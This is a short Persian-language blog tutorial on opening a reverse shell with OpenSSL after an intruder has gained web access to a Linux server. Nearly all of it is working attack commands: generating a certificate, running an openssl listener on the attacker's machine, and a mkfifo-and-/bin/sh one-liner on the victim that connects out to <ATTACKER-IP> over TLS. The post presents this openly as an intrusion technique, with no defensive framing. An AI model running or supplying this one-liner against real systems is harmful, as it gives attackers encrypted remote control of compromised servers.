شل معکوس با استفاده از OpenSSL

شل معکوس با استفاده از OpenSSL

یکی از دسترسی هایی که نفوذگر بعد از دسترسی به سرور از طریق وب یا … نیاز دارد ، دسترسی به Shell است .

بدین طریق میتوان از ابزار openssl که بر روی سرور های لینوکسی به طور پیشفرض نصب است استفاده کنید

پس ابتدا کلید را میسازیم :

 

[email protected]# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

 

حال اقدام به Listen میکنیم ( روی ماشین نفوذگر )  :

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

 

در آخر از طریق سرور مقصد برای اتصال بصورت معکوس به ماشین اقدام میکنیم :

 

[email protected]#: mkfifo /tmp/s; /bin/sh
-i < /tmp/s 2>&1 | openssl s_client -quiet -connect
<ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

 

واکنش شما چیست؟
+1
+1
+1
+1
+1
+1
+1
برچسب‌ها:, ,

نظر دهید

آدرس ایمیل شما منتشر نخواهد‌شد.